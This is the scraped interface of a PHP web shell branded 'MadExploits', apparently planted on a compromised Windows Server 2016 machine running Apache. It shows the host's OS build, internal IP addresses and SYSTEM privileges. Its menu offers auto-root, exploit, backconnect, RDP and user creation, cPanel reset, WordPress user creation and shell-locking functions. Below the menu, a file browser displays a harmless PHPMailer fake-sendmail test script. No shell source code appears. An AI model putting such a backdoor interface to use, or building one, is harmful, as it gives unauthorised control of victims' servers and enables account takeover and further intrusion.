Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
etc /
php /
pear /
PHPMailer /
test /
[ HOME SHELL ]
Name
Size
Permission
Action
bootstrap.php
140
B
-rw-rw-rw-
fakepopserver.sh
2.93
KB
-rw-rw-rw-
fakesendmail.sh
474
B
-rw-rw-rw-
phpmailerLangTest.php
2.29
KB
-rw-rw-rw-
phpmailerTest.php
76.7
KB
-rw-rw-rw-
runfakepopserver.sh
359
B
-rw-rw-rw-
test_callback.php
2.62
KB
-rw-rw-rw-
testbootstrap-dist.php
238
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fakesendmail.sh
#!/usr/bin/env bash #Fake sendmail script, adapted from: #https://github.com/mrded/MNPP/blob/ee64fb2a88efc70ba523b78e9ce61f9f1ed3b4a9/init/fake-sendmail.sh #Create a temp folder to put messages in numPath="${TMPDIR-/tmp/}fakemail" umask 037 mkdir -p $numPath if [ ! -f $numPath/num ]; then echo "0" > $numPath/num fi num=`cat $numPath/num` num=$(($num + 1)) echo $num > $numPath/num name="$numPath/message_$num.eml" while read line do echo $line >> $name done exit 0
Close